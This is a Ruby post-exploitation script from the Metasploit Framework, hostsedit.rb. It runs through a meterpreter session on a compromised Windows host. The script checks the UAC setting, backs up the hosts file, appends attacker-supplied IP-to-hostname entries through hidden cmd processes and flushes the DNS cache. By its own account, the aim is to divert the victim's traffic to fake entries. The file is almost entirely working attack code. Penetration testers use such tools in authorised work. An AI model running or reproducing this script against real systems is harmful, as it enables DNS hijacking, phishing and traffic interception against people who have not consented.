metasploit-framework/scripts/meterpreter/hostsedit.rb

96 lines
3.2 KiB
Ruby

# $Id$
# Meterpreter script for modifying the hosts file in windows
# given a single entrie or several in a file and clear the
# DNS cache on the target machine.
# This script works with Windows 2000,Windows XP,Windows 2003,
# Windows Vista and Windows 2008.
# Provided: carlos_perez[at]darkoperator[dot]com
# Version: 0.1.0
# Note: in Vista UAC must be disabled to be able to perform hosts
# file modifications.
################## Variable Declarations ##################
session = client
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Options." ],
"-e" => [ true, "Host entry in the format of IP,Hostname." ],
"-l" => [ true, "Text file with list of entries in the format of IP,Hostname. One per line." ]
)
def usage
print_line("This Meterpreter script is for adding entries in to the Windows Hosts file.")
print_line("Since Windows will check first the Hosts file instead of the configured DNS Server")
print_line("it will assist in diverting traffic to the fake entry or entries. Either a single")
print_line("entry can be provided or a series of entries provided a file with one per line.")
print_line(@@exec_opts.usage)
print_line("Example:\n\n")
print_line("run hostsedit -e 127.0.0.1,google.com\n")
print_line("run hostsedit -l /tmp/fakednsentries.txt\n\n")
raise Rex::Script::Completed
end
record = ""
#Set path to the hosts file
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
#Function check if UAC is enabled
def checkuac(session)
winver = session.sys.config.sysinfo
if winver["OS"] =~ (/Windows Vista/)
print_status("Checking if UAC is enabled.")
open_key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", KEY_READ)
value = open_key.query_value("EnableLUA").data
if value == 1
print_status("\tUAC is enabled")
raise "Unable to continue UAC is enabbled."
else
print_status("\tUAC is disabled")
status = false
end
end
end
#Function for adding record to hosts file
def add2hosts(session,record,hosts)
ip,host = record.split(",")
print_status("Adding Record for Host #{host} with IP #{ip}")
session.sys.process.execute("cmd /c echo #{ip}\t#{host} >> #{hosts}",nil, {'Hidden' => true})
end
#Make a backup of the hosts file on the target
def backuphosts(session,hosts)
random = sprintf("%.5d",rand(100000))
print_status("Making Backup of the hosts file.")
session.sys.process.execute("cmd /c copy #{hosts} #{hosts}#{random}.back",nil, {'Hidden' => true})
print_status("Backup loacated in #{hosts}#{random}.back")
end
# Clear DNS Cached entries
def cleardnscach(session)
print_status("Clearing the DNS Cache")
session.sys.process.execute("cmd /c ipconfig /flushdns",nil, {'Hidden' => true})
end
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-e"
checkuac(session)
backuphosts(session,hosts)
add2hosts(session,val,hosts)
cleardnscach(session)
when "-l"
checkuac(session)
if not ::File.exists?(val)
raise "File #{val} does not exists!"
else
backuphosts(session,hosts)
::File.open(val, "r").each_line do |line|
add2hosts(session,line.chomp,hosts)
end
cleardnscach(session)
end
when "-h"
usage
end
}
if args.length == 0
usage
end